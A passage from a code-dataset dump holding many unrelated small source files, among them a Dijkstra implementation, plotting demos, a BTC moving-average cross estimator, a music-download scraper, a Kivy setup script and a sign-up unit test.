Event.billing.unbilled_total(item_type_id=ItemType.SOCIAL)\n return context\n\n def post(self, request, *args, **kwargs):\n form_class = self.get_form_class()\n form = self.get_form(form_class)\n if form.is_valid():\n self.from_date = form.cleaned_data.get(\"from_date\", None)\n self.to_date = form.cleaned_data.get(\"to_date\", None)\n if \"filter\" in request.POST:\n return self.get(request, *args, **kwargs)\n elif \"export\" in request.POST:\n return export_pos(\n self.all_transactions().select_related(\"person\"),\n self.all_payments().select_related(\"person\"),\n )\n\n\ndef zero(value):\n return value if value else 0\n","sub_path":"members/views/billing_views.py","file_name":"billing_views.py","file_ext":"py","file_size_in_byte":16890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"594525740","text":"import heapq\nfrom collections import deque\n\n\ndef dijkstra(pairs, distances, nodes, sursa, destinatie):\n Q = []\n selected = {}\n parent = {}\n dist_values = {}\n\n for nod in nodes:\n selected[nod] = False\n\n selected[sursa] = True\n\n for nod in nodes:\n if nod in pairs[sursa]:\n dist_values[nod] = distances[(sursa, nod)]\n heapq.heappush(Q, nod)\n parent[nod] = sursa\n else:\n dist_values[nod] = float(\"inf\")\n parent[nod] = None\n\n while len(Q) != 0:\n u = heapq.heappop(Q)\n selected[u] = True\n for nod in pairs[u]:\n if (not selected[nod]) and dist_values[nod] > dist_values[u] + distances[(u, nod)]:\n dist_values[nod] = dist_values[u] + distances[(u, nod)]\n parent[nod] = u\n heapq.heapify(Q)\n\n # o coada(double-ended queue), pentru a insera la inceput\n drum = deque()\n nod = parent[destinatie]\n\n while nod != None:\n drum.appendleft(nod)\n nod = parent[nod]\n\n # adaug si destinatia\n drum.append(destinatie)\n\n # returnez drumul\n return \"Drum intre %s si %s: %s\" % (sursa, destinatie, list(drum))\n\n\nif __name__ == '__main__':\n input = open(\"dijkstra.in\", \"r\")\n N = int(input.readline())\n nodes = []\n for i in range(N):\n # rstrip removes newlines\n nodes.append(input.readline().rstrip())\n\n M = int(input.readline())\n pairs = {}\n distances = {}\n for i in range(M):\n [x, y, cost] = input.readline().split()\n pairs.setdefault(x, list()).append(y)\n pairs.setdefault(y, list()).append(x)\n distances[(x, y)] = int(cost)\n distances[(y, x)] = int(cost)\n\n\n print(\"PAIRS: \", pairs)\n print()\n\n print(\"DISTANCES: \", distances)\n print()\n\n print(\"NODES: \", nodes)\n print()\n\n sursa = \"Bucuresti\"\n\n for destinatie in nodes:\n print(dijkstra(pairs, distances, nodes, sursa, destinatie))\n","sub_path":"Dijkstra-algorithm/Dijkstra algorithm.py","file_name":"Dijkstra algorithm.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"566290954","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx=np.linspace(0.,1.,100)\ny=x**2\n\n#Basic plot of a curve\nplt.figure()\nplt.plot(x,y)\nplt.show()\n\n#same curve on a log log plot\nplt.figure()\nplt.yscale('log')\nplt.xscale('log')\nplt.plot(x,y)\nplt.show()\n\n\n# scatter versus plot\nplt.figure()\nplt.scatter(x,y)\nplt.show()\n\n\n\n# barchat versus plot fix xrange\nplt.figure()\nplt.bar(x,y,0.01)\nplt.xlim(0.,1.)\n#plt.show()\nplt.savefig('bar.pdf', format='pdf')\nplt.close()\n","sub_path":"Lecture 2/basicplot.py","file_name":"basicplot.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"540343048","text":"\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 15 16:25:48 2019\r\n\r\n@author: mirco\r\n\"\"\"\r\n\"\"\"1__intervallo di fiducia per l'attesa\"\"\r\n\"\"\"\"\"\r\nimport numpy as np\r\nimport tavole\r\n\r\narr=np.array([4.09,4.56,5.01,5.49,4.82,5.56,3.95,4.04,2.63,3.78,\r\n 3.58,4.52,4.86,3.65,4.44,4.62,3.97,3.63])\r\nn=len(arr)\r\nalfa=0.05\r\nvar=1\r\n\r\nprint('1: intervallo di fiducia per attesa')\r\n\"\"\"1_media \"\"\"\r\ni=0\r\nbuf=0\r\nsum=0\r\nwhile i signals['mid_mavg'][short_window:], 1.0, 0.0)\n signals['positions'] = signals['signal'].diff()\n\n plt.figure(figsize=(14, 7))\n plt.plot(btc_adj.index, btc_adj, lw=3, alpha=0.8, label='Original observations')\n plt.plot(btc_adj.index, roll_d10, lw=3, alpha=0.8, label='Rolling mean (window 50)')\n plt.plot(btc_adj.index, roll_d50, lw=3, alpha=0.8, label='Rolling mean (window 200)')\n plt.plot(signals.loc[signals.positions == 1.0].index,\n signals.short_mavg[signals.positions == 1.0],\n '^', markersize=10, color='r', label='buy')\n\n plt.plot(signals.loc[signals.positions == -1.0].index,\n signals.short_mavg[signals.positions == -1.0],\n 'v', markersize=10, color='k', label='sell')\n\n plt.title('BTC-USD Adj Close Price (The Technical Approach)')\n plt.tick_params(labelsize=12)\n plt.legend(loc='upper left', fontsize=12)\n\n plt.show()\n\n # plt.savefig('images/intersection-1.png')\n\n\ndef rsi_peaks(closePrices, candles=10):\n\n np.random.seed(42)\n\n fig, ax = plt.subplots(facecolor='#07000d')\n\n ax.set_facecolor('#07000d')\n\n #fig = plt.figure(facecolor='#07000d')\n # ax = plt.subplot2grid((6,4), (0,0), axisbg='#07000d')\n\n rsiCol = '#c1f9f7'\n posCol = '#386d13'\n negCol = '#8f2020'\n\n rsi = talib.RSI(closePrices, timeperiod=14)\n\n # https://gist.github.com/sixtenbe/1178136#file-peakdetect-py\n # cb = np.array([-0.010223, ...])\n # peaks = peakdetect(cb, lookahead=100)\n\n minima = []\n maxima = []\n\n rsi_n = rsi[-candles:]\n\n for i in range(1, candles-1):\n\n if rsi_n[i] < rsi_n[i-1] and rsi_n[i] < rsi_n[i+1]:\n # local minima\n minima.append(i)\n if rsi_n[i] > rsi_n[i - 1] and rsi_n[i] > rsi_n[i + 1]:\n # local maxima\n maxima.append(i)\n\n # peaks, _ = find_peaks(rsi_n.values, height=60)\n\n ax.plot(rsi[-candles:].index, rsi[-candles:].values, rsiCol, label=\"RSI\", linewidth=1.5)\n # plt.plot(rsi_n[peaks].index, rsi_n[peaks].values, \"x\")\n\n ax.fill_between(rsi[-candles:].index, rsi[-candles:].values, 70, where=(rsi[-candles:].values >= 70), facecolor=negCol, edgecolor=negCol, alpha=0.5)\n ax.fill_between(rsi[-candles:].index, rsi[-candles:].values, 30, where=(rsi[-candles:].values <= 30), facecolor=posCol, edgecolor=posCol, alpha=0.5)\n\n ax.set_yticks([30, 70])\n ax.yaxis.label.set_color(\"w\")\n ax.spines['bottom'].set_color(\"#5998ff\")\n ax.spines['top'].set_color(\"#5998ff\")\n ax.spines['left'].set_color(\"#5998ff\")\n ax.spines['right'].set_color(\"#5998ff\")\n ax.tick_params(axis='y', colors='w')\n ax.tick_params(axis='x', colors='w')\n\n plt.ylabel('RSI')\n\n ax.plot(rsi_n[maxima], \"x\")\n\n fig.autofmt_xdate()\n\n ax.axhline(70, color=negCol)\n ax.axhline(30, color=posCol)\n\n ax.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')\n plt.ylabel('RSI')\n\n ax.grid(True, color='w')\n\n plt.show()\n\n\ndef plot_next_cross(data1, data, prices_a, prices_b):\n D = np.array(data1)\n T = np.array(data)\n E1 = np.array(prices_a)\n E2 = np.array(prices_b)\n\n A = np.column_stack([T ** 0, T])\n\n p1, pint1, se1 = regress(A, E1, alpha=0.05)\n\n p2, pint2, se2 = regress(A, E2, alpha=0.05)\n\n # Now we have two lines: y1 = m1*T + b1 and y2 = m2*T + b2\n # they intersect at m1*T + b1 = m2*T + b2\n # or at T = (b2 - b1) / (m1 - m2)\n b1 = u.ufloat(p1[0], se1[0])\n m1 = u.ufloat(p1[1], se1[1])\n\n b2 = u.ufloat(p2[0], se2[0])\n m2 = u.ufloat(p2[1], se2[1])\n\n T_intersection = (b2 - b1) / (m1 - m2)\n # print(T_intersection)\n\n T_intersect_nv = T_intersection.nominal_value\n\n print(datetime.datetime.fromtimestamp(int(T_intersect_nv)))\n\n fig, ax = plt.subplots()\n\n # plt.figure()\n\n ax.set(xlabel=\"Date\", ylabel=\"Price (USD)\", )\n ax.set_title(\"Golden/Death Cross\\nEstim. Date\")\n\n myFmt = DateFormatter(\"%m-%d\")\n\n ax.xaxis.set_major_formatter(myFmt)\n ax.tick_params(axis='x', rotation=45)\n\n # plot the data, the fits and the intersection and \\pm 2 \\sigma.\n ax.plot(D, E1, 'bo ', label='MA50')\n ax.plot(D, np.dot(A, p1), 'b-')\n ax.plot(D, E2, 'ro ', label='MA200')\n ax.plot(D, np.dot(A, p2), 'r-')\n\n a = datetime.datetime.fromtimestamp(int(T_intersect_nv))\n b = (b1 + m1 * T_intersection).nominal_value\n\n ax.plot(a, b, 'go', ms=13, alpha=0.2, label='Intersection')\n\n label = \"{:.2f}\".format(b) + \" - \" + str(a.date())\n\n ax.annotate(label, xy=(a, b), xycoords='data', xytext=(a, b),\n arrowprops=dict(facecolor='black', shrink=0.05))\n\n x = datetime.datetime.fromtimestamp(int((T_intersect_nv - 2 * T_intersection.std_dev)))\n\n y = datetime.datetime.fromtimestamp(int((T_intersect_nv + 2 * T_intersection.std_dev)))\n\n plt.show(block=False)\n\n '''\n ax.plot([x,\n y],\n [(b1 + m1 * T_intersection).nominal_value,\n (b1 + m1 * T_intersection).nominal_value],\n 'g-', lw=0.5, label='$\\pm 2 \\sigma$')\n '''\n\n ax.legend(loc='best')\n plt.show(block=True)\n\n\ndef main():\n\n # number of daily candles to analyze\n\n x = 60\n\n date_str = (datetime.datetime.now() - datetime.timedelta(days=x)).date()\n\n btc = web.get_data_yahoo('BTC-USD', start=datetime.datetime(2017, 1, 1), end=date.today())\n\n btc_adj = btc['Adj Close']\n\n # show rsi peaks (beta)\n # rsi_peaks(btc_adj)\n\n # btc_adj.plot(lw=2.5, figsize=(12, 5))\n # plt.show()\n\n short_window = 50\n mid_window = 200\n\n signals = pd.DataFrame(index=btc_adj.index)\n signals['signal'] = 0.0\n\n roll_d10 = btc_adj.rolling(window=short_window).mean()\n roll_d50 = btc_adj.rolling(window=mid_window).mean()\n\n signals['short_mavg'] = roll_d10\n signals['mid_mavg'] = roll_d50\n\n\n data_normal = roll_d10[-x:].index.tolist()\n\n # data_ts = [int(time.mktime(roll_d10[-1:].index[0].timetuple()) ), int(time.mktime(roll_d10[-20:].index[0].timetuple()) )]\n # convert time to timestamp to act as a number\n data_ts = (roll_d10[-x:].index.astype(np.int64) // 10 ** 9).tolist()\n\n prices_a = roll_d10[-x:].tolist()\n prices_b = roll_d50[-x:].tolist()\n\n plot_next_cross(data_normal, data_ts, prices_a, prices_b)\n\n # plot_crosses(signals, btc_adj, roll_d10, roll_d50)\n\n print(cross_date(data_normal, data_ts, prices_a, prices_b))\n\n\nif __name__ == '__main__':\n main()","sub_path":"ta-cross.py","file_name":"ta-cross.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"459308686","text":"\ndef seconds(seconds_list):\n new_list = []\n for element in range(1, len(seconds_list)):\n if element % 2 != 0:\n new_list.append(seconds_list[element])\n return new_list\n\n # Create a function that takes a list as a parameter,\n # and returns a new list with every second element from the orignal list\n # example: [1, 2, 3, 4, 5] should produce [2, 4]\n\nprint(seconds([1, 2, 3, 4, 5, 6])) # should print [2, 4]\n","sub_path":"seconds/seconds_solution.py","file_name":"seconds_solution.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"189040749","text":"import os\nfrom bs4 import BeautifulSoup\nimport requests\n\n\nURL = \"https://losslessplus.com/visit.php?job=viewresult&sid=5a9c9c50497cfdf68758b4e868955d2d\"\n\nresp = requests.get(URL)\n\nsoup = BeautifulSoup(resp.text, \"html.parser\")\n\nfor a in reversed(soup.find_all(\"a\", class_=\"linkbai\")):\n tenbai = a.text\n linkbai = requests.get(a.get(\"href\"))\n linkbai_soup = BeautifulSoup(linkbai.text, \"html.parser\")\n download_link_0 = linkbai_soup.find(id=\"zoomtext\").find(\n \"div\", class_=\"quote-content-2\").a.get(\"href\")\n download_link_1 = requests.get(\n download_link_0.replace(\"url.php\", \"url2.php\"))\n download_link_1_soup = BeautifulSoup(download_link_1.text, \"html.parser\")\n content = download_link_1_soup.find(\n \"meta\", {\"http-equiv\": \"refresh\"}).get(\"content\")\n local_file_name = tenbai + \".flac\"\n drive_link = content.split(\"url=\")[-1]\n print(drive_link)\n if not os.path.exists(\"download/\" + local_file_name):\n with requests.get(drive_link, stream=True) as r:\n try:\n r.raise_for_status()\n with open(\"download/\" + local_file_name, 'wb') as f:\n for chunk in r.iter_content(chunk_size=8192):\n if chunk:\n f.write(chunk)\n except Exception as e:\n print(e)\n print(tenbai)\n pass\n","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"535758080","text":"\n\ninvestment =400000\nprofit=10\ncategory_index=[1,2,3]\ninterval_percentage=0.8\ndef no_of_shares(investment,stock_price):\n no_of_shares= round(investment/stock_price)\n return no_of_shares\n\n\n\n\n\n\ndef taxes(no_of_shares,sell_value,buy_value,diff):\n turnaround=no_of_shares*(sell_value+buy_value)\n print('turnaround',turnaround)\n brokerage= min(20,turnaround*0.0001) \n print('brokerage',brokerage)\n stt= round((sell_value*no_of_shares)*0.00025)\n print('stt',stt)\n tc=round(turnaround*0.0000325,2)\n print('tc',tc)\n gst=round(0.18*(brokerage+tc),2)\n print('gst',gst)\n sebi=round(0.000001*turnaround,2)\n print('sebi',sebi)\n stamp=round(0.000002*turnaround,2)\n print('stamp',stamp)\n total=brokerage+stt+tc+gst+sebi+stamp\n print(\"Total Cost\",total)\n print(\"trade_profit\",diff)\n pnl=diff-total\n\n \n return pnl\n\ndef check_lables( profit, call):\n \n label=[0,0]\n if profit in range (10, 100):\n label= [call,1]\n elif int(profit) in range (100, 300):\n label= [call,2]\n elif int(profit) in range (300, 500):\n label= [call,3]\n elif profit>= 500:\n label= [call,4]\n else:\n label= [3,0]\n\n label=int(\"\".join(map(str, label)))\n \n return label\n\n\ndef category_generator(first,nxt):\n high_future_price = nxt['high'].max()\n low_future_price=nxt['low'].min()\n buy_price= first['close'].iloc[-1]\n \n #shares= no_of_shares(investment,buy_price)\n if ((high_future_price-buy_price)/buy_price )*100 >=((buy_price-low_future_price)/buy_price )*100 and ((high_future_price-buy_price)/buy_price )*100 >= interval_percentage:\n \n call=1 # buy \n # buy_value=buy_price\n # sell_value=high_future_price\n # diff= abs(buy_price-sell_value)*shares\n elif ((buy_price-low_future_price)/buy_price )*100 >= interval_percentage :\n call=2 # sell\n # sell_value=low_future_price\n # buy_value=buy_price\n # diff= abs(buy_price-sell_value)*shares\n else:\n call= 3 # dont do anything\n # sell_value=buy_price\n # buy_value=buy_price\n # diff= abs(buy_price-sell_value)*shares\n \n\n \n # print('Call is',call)\n # pnl =taxes(shares,sell_value,buy_value,diff)\n # cat=check_lables( pnl, call)\n cat_index=category_index.index(call)\n \n\n\n return cat_index\n\n\n\n \n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"category_generator.py","file_name":"category_generator.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"482814430","text":"import string\nalphaconst=list(string.ascii_lowercase)\nalphavowels=[\"a\",\"e\",\"i\",\"o\",\"u\"]\nfor i in alphavowels:\n if i in alphaconst:\n alphaconst.remove(i)\nalphexcep=['be', 'see', 'flee', 'knee']\n\n\ndef make_ing_form(stringlist,n):\n stringlist=list(stringlist)\n if stringlist[2] == 'e' and stringlist[1]=='i':\n stringlist=stringlist[0]+\"ying\"\n return stringlist\n elif stringlist[2]=='e' and n not in alphexcep:\n stringlist=\"\".join(stringlist[0:2])+\"ing\"\n return stringlist\n\n elif stringlist[0] in alphaconst and stringlist[1] in alphavowels and stringlist[2] in alphaconst:\n stringlist=\"\".join(stringlist)+\"{0}ing\".format(stringlist[2])\n return stringlist\n else:\n if n in alphexcep:\n return \"\".join(stringlist)\n else:\n return \"\".join(stringlist)+\"ing\"\n\nn=input(\"Enter a word\")\nlaststr=n[len(n):-4:-1]\nlaststr=laststr[::-1]\nprint(laststr)\nfirststr=n[0:len(n)-3:1]\nprint(firststr)\nn1=make_ing_form(laststr,n)\nn=firststr+n1\nprint(\"\".join(n))","sub_path":"Two/Q8.py","file_name":"Q8.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"215197974","text":"from os import environ, remove\nfrom os.path import dirname, join, isfile\nfrom distutils.core import setup\nimport kivy\nfrom distutils.extension import Extension\ntry:\n from Cython.Build import cythonize\n from Cython.Distutils import build_ext\n have_cython = True\nexcept ImportError:\n have_cython = False\nimport sys\n\n\nplatform = sys.platform\nif platform == 'win32':\n cstdarg = '-std=gnu99'\n libraries = ['opengl32', 'glu32','glew32']\nelse:\n cstdarg = '-std=c99'\n libraries = []\n\ndo_clear_existing = True\n\n\n\npolygen_modules = {\n 'kivent_polygen.polygen_renderers': ['kivent_polygen/polygen_renderers.pyx',],\n 'kivent_polygen.polygen_formats': ['kivent_polygen/polygen_formats.pyx',],\n}\n\npolygen_modules_c = {\n 'kivent_polygen.polygen_renderers': ['kivent_polygen/polygen_renderers.c',],\n 'kivent_polygen.polygen_formats': ['kivent_polygen/polygen_formats.c',],\n}\n\ncheck_for_removal = [\n 'kivent_polygen/polygen_formats.c',\n 'kivent_polygen/polygen_renderers.c',\n\n ]\n\ndef build_ext(ext_name, files, include_dirs=[]):\n return Extension(ext_name, files, include_dirs,\n extra_compile_args=[cstdarg, '-ffast-math',],\n libraries=libraries,)\n\nextensions = []\npolygen_extensions = []\ncmdclass = {}\n\ndef build_extensions_for_modules_cython(ext_list, modules):\n ext_a = ext_list.append\n for module_name in modules:\n ext = build_ext(module_name, modules[module_name], \n include_dirs=kivy.get_includes())\n if environ.get('READTHEDOCS', None) == 'True':\n ext.pyrex_directives = {'embedsignature': True}\n ext_a(ext)\n return cythonize(ext_list)\n\ndef build_extensions_for_modules(ext_list, modules):\n ext_a = ext_list.append\n for module_name in modules:\n ext = build_ext(module_name, modules[module_name], \n include_dirs=kivy.get_includes())\n if environ.get('READTHEDOCS', None) == 'True':\n ext.pyrex_directives = {'embedsignature': True}\n ext_a(ext)\n return ext_list\n\nif have_cython:\n if do_clear_existing:\n for file_name in check_for_removal:\n if isfile(file_name):\n remove(file_name)\n polygen_extensions = build_extensions_for_modules_cython(\n polygen_extensions, polygen_modules)\nelse:\n polygen_extensions = build_extensions_for_modules(polygen_extensions, \n polygen_modules_c)\n\n\nsetup(\n name='KivEnt Polygen',\n description='''A game engine for the Kivy Framework. \n https://github.com/Kovak/KivEnt for more info.''',\n author='Jacob Kovac',\n author_email='kovac1066@gmail.com',\n ext_modules=polygen_extensions,\n cmdclass=cmdclass,\n packages=[\n 'kivent_polygen',\n ],\n package_dir={'kivent_polygen': 'kivent_polygen'})\n","sub_path":"modules/polygen/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"30037423","text":"# Motivation for Builder\r\n# If this were a real application it would probably have to deal with an \r\n# endless list of attributes to configure\r\n# Note: this code is not meant to be run!\r\n\r\nclass Robot:\r\n def __init__(self, left_leg, right_leg, left_arm, right_arm,\r\n left_wing, right_wing, tail, blades, cameras,\r\n infrared_module #, ...\r\n ):\r\n self.left_leg = left_leg\r\n if left_leg == None:\r\n bipedal = False\r\n self.right_leg = right_leg\r\n self.left_arm = left_arm\r\n self.right_arm = right_arm\r\n # ...\r\n\r\n","sub_path":"robot_bad.py","file_name":"robot_bad.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"33199058","text":"import numpy as np\nimport random\nfrom collections import Counter\nfrom abjad import *\nfrom copy import deepcopy\n\ncontainer = []\nintervals = [.5, 1.5, 2.5, 3.5]\nfor interval in intervals:\n\tstarting_pitch = 25\n\twhile (starting_pitch > 16):\n\t\tif (starting_pitch != 19.5 and starting_pitch - interval != 19.5 and starting_pitch - 2*interval != 19.5):\n\t\t\tcontainer.append(starting_pitch)\n\t\t\tcontainer.append(starting_pitch - interval)\n\t\t\tcontainer.append(starting_pitch - 2*interval)\n\t\telse:\n\t\t\tcontainer.append(11)\n\t\t\tcontainer.append(11)\n\t\t\tcontainer.append(11)\n\t\tfor i in range(5):\n\t\t\tcontainer.append(11)\n\t\tstarting_pitch -= 1/2.\n\tfor j in range(8):\n\t\tcontainer.append(30)\n\n# make/show score\ncontainer = [Note(pit,1/8.) for pit in container]\ninstruments = set(['Flute'])\nparts = {instrument: Staff([], name=instrument) for instrument in instruments}\nparts['Flute'].extend(container)\nscore = Score([parts[instrument] for instrument in parts], name=\"poopy\")\nattach(MetronomeMark((1,4), 160), parts['Flute'][0])\nshow(score)","sub_path":"trash/scripts/triads.py","file_name":"triads.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"426507353","text":"'''\n@Author: ruoru\n@Date: 2019-11-07 11:06:02\n@LastEditors: ruoru\n@LastEditTime: 2019-11-07 11:24:30\n@Description: https://leetcode-cn.com/explore/interview/card/top-interview-questions-easy/5/strings/39/\n'''\n\n# New in version 3.2.\nfrom functools import lru_cache\n\nclass Solution(object):\n \"\"\"\n 1. 1 初始数\n 2. 11 2的前一个数是1,1对应的报数顺列为1,它读作一个一,即 11\n 3. 21 3的前一个数是2,2对应的报数顺列为11,它读作两个一,即 21\n 4. 1211 4的前一个数是3,3对应的报数顺列为21,它读作一个二,一个一,即 1211\n 5. 111221 5的前一个数是4,4对应的报数顺列为1211,它读作一个一,一个二,两个一,即 111221\n \"\"\"\n\n def get_seq(self, seq):\n cur_char = seq[0]\n cur_count = 1\n result = []\n for c in seq[1::]:\n if c == cur_char:\n cur_count += 1\n else:\n result.append(\"{}{}\".format(cur_count, cur_char))\n cur_char = c\n cur_count = 1\n # 最后一个元素\n result.append(\"{}{}\".format(cur_count, cur_char))\n return \"\".join(result)\n \n @lru_cache(maxsize=30)\n def countAndSay(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n # 第一种思路,因为题目的 n 最大是30,所以可以把1-30的结果都存下来\n # 第二种思路,递归\n if n == 1:\n return \"1\"\n \n pre_seq = self.countAndSay(n - 1)\n return self.get_seq(pre_seq)\n\n\nif __name__ == \"__main__\":\n s = Solution()\n # print(s.get_seq(\"1\"))\n # print(s.get_seq(\"11\"))\n # print(s.get_seq(\"1211\"))\n # print(s.get_seq(\"111221\"))\n print(s.countAndSay(1))\n print(s.countAndSay(2))\n print(s.countAndSay(3))\n print(s.countAndSay(4))\n print(s.countAndSay(5))\n print(s.countAndSay(6))\n print(s.countAndSay(5))\n print(s.countAndSay(4))\n print(s.countAndSay(3))\n print(s.countAndSay.cache_info())","sub_path":"explore_cn/top_interview_questions_easy/b_strings/02_strings_39.py","file_name":"02_strings_39.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"627486537","text":"class sparse_token:\n\n def __init__(self,_value='',_type='',_ln=-1,_pos=-1,_fname=''):\n self.fname=_fname\n self.ln=_ln\n self.pos=_pos\n self.value=_value\n self.type=_type\n\n def __repr__(self):\n return \"(%s:%s)\" % (self.type,self.value)\n\n def copy(self):\n return sparse_token(_value=self.value[:],\n _type=self.type[:],\n _fname=self.fname[:],\n _ln=self.ln,\n _pos=self.pos)\n\n def matches(self,pattern_token,case_sensitive=True):\n type_match=True\n value_match=True\n if pattern_token.type!='':\n type_match=(pattern_token.type==self.type)\n if pattern_token.value!='':\n if case_sensitive:\n value_match=(pattern_token.value==self.value)\n else:\n value_match=(pattern_token.value.lower()==self.value.lower())\n return type_match and value_match\n","sub_path":"python/sparse_token.py","file_name":"sparse_token.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"594988957","text":"\"\"\"Constants for the IPP integration.\"\"\"\n\n# Integration domain\nDOMAIN = \"ipp\"\n\n# Attributes\nATTR_COMMAND_SET = \"command_set\"\nATTR_IDENTIFIERS = \"identifiers\"\nATTR_INFO = \"info\"\nATTR_MANUFACTURER = \"manufacturer\"\nATTR_MARKER_TYPE = \"marker_type\"\nATTR_MARKER_LOW_LEVEL = \"marker_low_level\"\nATTR_MARKER_HIGH_LEVEL = \"marker_high_level\"\nATTR_MODEL = \"model\"\nATTR_SERIAL = \"serial\"\nATTR_SOFTWARE_VERSION = \"sw_version\"\nATTR_STATE_MESSAGE = \"state_message\"\nATTR_STATE_REASON = \"state_reason\"\nATTR_URI_SUPPORTED = \"uri_supported\"\n\n# Config Keys\nCONF_BASE_PATH = \"base_path\"\nCONF_SERIAL = \"serial\"\nCONF_TLS = \"tls\"\nCONF_UUID = \"uuid\"\n","sub_path":"homeassistant/components/ipp/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"473906338","text":"\"\"\"\nCode for creating and saving a movie.\nFrom StackOverflow post: http://stackoverflow.com/questions/4092927/generating-movie-from-python-without-saving-individual-frames-to-files\n\"\"\"\nimport matplotlib.animation as animation\nimport numpy as np\nfrom pylab import *\n\nDPI = 100\n\n\ndef ani_frame():\n fig = plt.figure(tight_layout=True)\n ax = fig.add_subplot(111)\n ax.set_aspect('equal')\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n im = ax.imshow(rand(300, 300), cmap='hot', interpolation='nearest')\n im.set_clim([0, 1])\n fig.set_size_inches([5, 5])\n\n def update_img(n):\n tmp = rand(300, 300)\n im.set_data(tmp)\n return im\n\n ani = animation.FuncAnimation(fig, update_img, 300, interval=30)\n writer = animation.writers['ffmpeg'](fps=30)\n\n ani.save('demo.mp4', writer=writer, dpi=DPI)\n return ani\n\n\nif __name__ == '__main__':\n ani_frame()","sub_path":"save_movie.py","file_name":"save_movie.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"80181850","text":"from player import HumanPlayer, ComputerPlayer\nimport time\n\nclass TicTacToe:\n def __init__(self):\n self.board = [\" \" for _ in range(9)]\n self.current_winner = None\n\n def print_board(self):\n for ii in range(3):\n row = self.board[ii*3:(ii+1)*3]\n print('| ' + ' | '.join(row) + ' |')\n\n # for row in [self.board[ii*3:ii+1*3] for ii in range(3)]:\n # print('| ' + ' | '.join(row) + ' |')\n\n @staticmethod\n def print_board_nums():\n board_nums = [[str(jj) for jj in range(kk*3, (kk+1)*3)] for kk in range(3)]\n for row in board_nums:\n print('| ' + ' | '.join(row) + ' |')\n\n def available_moves(self):\n return [idx for idx, space in enumerate(self.board) if space == \" \"]\n\n def empty_squares(self):\n return ' ' in self.board\n\n def winner(self, square, letter):\n # Check row\n row_idx = square // 3\n row = self.board[row_idx*3:(row_idx+1)*3]\n if all([space == letter for space in row]):\n return True\n\n # Check collumn\n col_idx = square % 3\n column = [self.board[col_idx+ii*3] for ii in range(3)]\n if all([space == letter for space in column]):\n return True\n\n # Check diagonals\n diag1 = [self.board[mm] for mm in [0, 4, 8]]\n if all([space == letter for space in diag1]):\n return True\n\n diag2 = [self.board[nn] for nn in [2, 4, 6]]\n if all([space == letter for space in diag2]):\n return True\n\n return False\n\n def make_move(self, spot, letter):\n if self.board[spot] == \" \":\n self.board[spot] = letter\n if self.winner(spot, letter):\n self.current_winner = True\n return True\n return False\n\ndef play(game, x_player, o_player):\n game.print_board_nums()\n letter = 'X'\n\n while game.empty_squares():\n if letter == 'X':\n move = x_player.get_move(game)\n else:\n move = o_player.get_move(game)\n\n if game.make_move(move, letter):\n game.print_board()\n print(f\"{letter} made a move to square {move}\")\n print('\\n')\n\n if game.current_winner:\n print(f\"{letter} wins!\")\n return letter\n\n letter = 'O' if letter == 'X' else 'X'\n time.sleep(1)\n\n print(\"It's a Tie\")\n\n\nif __name__ == '__main__':\n t = TicTacToe()\n x = HumanPlayer('X')\n o = ComputerPlayer('O')\n play(t, x, o)\n\n\n\n\n\n","sub_path":"Tic_Tac_Toe/Trial/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"261984028","text":"import json\nimport unittest\nfrom unittest.mock import patch\n\nfrom sign_up import lambda_handler\n\n\nclass TestSignUPAPI(unittest.TestCase):\n def setUp(self):\n self.event = {\"requestContext\": {\"stage\": \"TEST\"}}\n\n self.signup = {\"path\": \"/signup\",\n \"httpMethod\": \"GET\",\n \"requestContext\":\n {\"authorizer\":\n {\"claims\":\n {\"email_verified\": True,\n \"name\": \"Dummy\",\n \"email\": \"dummy@dummy.com\"\n }\n },\n \"accountId\": \"123456\",\n \"requestId\": \"T01\",\n \"requestTimeEpoch\": \"987654321\"\n }\n }\n\n self.delete_user = {\"path\": \"/delete-user\",\n \"httpMethod\": 